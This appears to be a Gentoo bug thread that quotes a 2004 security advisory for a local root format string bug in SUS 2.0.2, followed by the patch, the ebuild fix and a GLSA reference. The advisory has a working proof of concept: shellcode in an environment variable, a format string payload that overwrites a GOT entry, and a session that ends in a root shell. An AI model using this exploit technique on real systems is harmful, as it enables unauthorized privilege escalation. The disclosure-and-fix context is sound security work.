[pasted from e-mail] LSS Security Advisory #1: GENTOO SUS 2.0.2 local root exploit ------------------------------------------------------------- Advisory ID: 1 Impact: local user can gain root privileges Vendor status: notified Vulnerability type: local Risk: High Bug founder: Leon Juranic <ljuranic@lss.hr> Date: 4.6.2004 ===[ Overview SUS is suid root program that will allow to ordinary user execution of some program as the superuser. SUS relatives are super, sudo and very insecure calife. SUS is setuid root by default. ===[ Vulnerability There is a very simple format string bug in log() function that any local user can exploit to gain root privileges. Format string vulnerability is the result of the very common incorrect syslog() call, and can be exploited on command line. log.c: -------- void log(char * msg) { ... openlog(ident, LOG_PID|LOG_CONS, facility); syslog(level,msg); // <- VULNERABLITY ... } -------- ===[ PoC exploit In this PoC example, we will put shellcode in the HACK environment variable, and overwrite GOT entry of getspnam() function with HACK address. There are NOP opcodes in HACK variable, but in fact, they are not needed. In the end, root shell is spawned. getspnam() address -> 08061780 HACK variable address -> 0xbffffb54 [root@laptop root]# objdump -R /usr/bin/sus | grep getspnam 08061780 R_386_JUMP_SLOT getspnam [root@laptop root]# su ljuranic [ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53 \x89\xe1\xcd\x80"'` [ljuranic@laptop ljuranic]$ ./env HACK bffffb54 [ljuranic@laptop ljuranic]$ id uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic) [ljuranic@laptop ljuranic]$ sus -V Version 2.0.2 [ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus -rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus [ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06 \x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259 \\$n%.192u%260\\$n"'` sh-2.05a# id uid=0(root) gid=0(root) groups=0(root) sh-2.05a# ===[ Fix Quick patch for log.c: -------- 153c153 < syslog(level,msg); --- >> syslog(level,"%s",msg); --------
Created attachment 39526 [details, diff] sus-2.0.2 local root vuln fix
Please commit a patched ebuild so we can start stable marking if you don't mark stable.
Fixed ebuild is already in portage as sus-2.0.2-r1.ebuild, and marked stable.
Kumba thx. Security please draft.
from http://pdg.uow.edu.au/sus/CHANGES 2.0 - July 2002 First production release 2.0.1 - 2.0.5 Numerous cleanups, no functionality changes 2.0.6 - Sept 14, 2004 Fixed a security problem in call to syslog in log.c. All users should upgrade to 2.0.6 as soon as possible. Many thanks to Leon Juranic at the University of Zagreb for finding this problem.
hmm, I checked the site yesterday, and saw no new version. Must've posted it after I checked. I'll get 2.0.6 into portage soon.
Thx Kumba. GLSA 200409-17